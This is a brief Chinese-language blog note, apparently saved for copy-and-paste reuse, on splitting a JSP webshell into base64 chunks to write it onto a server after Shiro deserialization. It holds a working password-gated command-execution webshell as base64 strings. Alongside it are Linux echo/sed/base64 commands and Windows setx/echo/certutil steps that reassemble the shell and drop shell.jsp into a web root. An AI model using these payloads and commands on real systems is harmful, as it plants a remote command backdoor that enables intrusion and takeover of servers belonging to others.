题记
打工人偶尔摸鱼看看技术文章,今天点到了一篇记录shiro反序列化分段写webshell的文章,记录一下,方便以后Ctrl+c与Ctrl+v,因为经常会遇到需要手动写webshell的情况。
Linux写入webshell
1、准备好我们的马
2、base64编码(这里推荐编码网站http://www.hiencode.com)
3、把编码后的代码分好段单独写入。
echo 'PCUKICAgIGlmKCJhZG1pbiIuZXF1YWxzKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJwd2QiKSkpewogICAgICAgIGphdmEuaW8uSW5wdXRTdHJlYW0gaW4gPSBSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKS' > ./shell.jsp
第二段需要在行尾插入,原文语句我这里报错,百度后以下代码可以完成。
sed -i 's/$/kuZ2V0SW5wdXRTdHJlYW0oKTsKICAgICAgICBpbnQgYSA9IC0xOwogICAgICAgIGJ5dGVbXSBiID0gbmV3IGJ5dGVbMjA0OF07CiAgICAgICAgb3V0LnByaW50KCI8cHJlPiIpOwogICAgICAgIHdoaWxlKChhPWluLnJlYWQoYikpIT0tMSl7CiAgICAgICAgICAgIG91dC5wcmludGxuKG5ldyBTdHJpbmcoYikpOwogICAgICAgIH0KICAgICAgICBvdXQucHJpbnQoIjwvcHJlPiIpOwogICAgfQolPg==/' ./shell.jsp
4、base解密重新写入
cat ./shell.jsp|base64 -d > ./shell2.jsp
windows写入webshell
1、设置永久环境变量
setx chunk_1 PCUKICAgIGlmKCJhZG1pbiIuZXF1YWxzKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJwd2QiKSkpewogICAgICAgIGphdmEuaW8uSW5wdXRTdHJlYW0gaW4gPSBSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKS
setx chunk_2 kuZ2V0SW5wdXRTdHJlYW0oKTsKICAgICAgICBpbnQgYSA9IC0xOwogICAgICAgIGJ5dGVbXSBiID0gbmV3IGJ5dGVbMjA0OF07CiAgICAgICAgb3V0LnByaW50KCI8cHJlPiIpOwogICAgICAgIHdoaWxlKChhPWluLnJlYWQoYikpIT0tMSl7CiAgICAgICAgICAgIG91dC5wcmludGxuKG5ldyBTdHJpbmcoYikpOwogICAgICAgIH0KICAgICAgICBvdXQucHJpbnQoIjwvcHJlPiIpOwogICAgfQolPg==
2、当设置完环境变量或N个环境变量后写入文件(本机测试需要注意重开一个cmd框)
echo %chunk_1%%chunk_2% > ./text
3、解码写到web目录下
certutil -decode ./text D:\git\phpStudy\PHPTutorial\WWW\shell.jsp
参考文章
记一次shiro反序列化无法写入shell分析:http://mp.weixin.qq.com/s?__biz=MzkzMDMwNzk2Ng==&mid=2247495176&idx=1&sn=268c6bf534ed3cc610ccb5df6d5bec73&chksm=c27ee419f5096d0f6720921d2f6d2183574c81cad0cc06c95dfa82f842f41099733e99705070&scene=132#wechat_redirect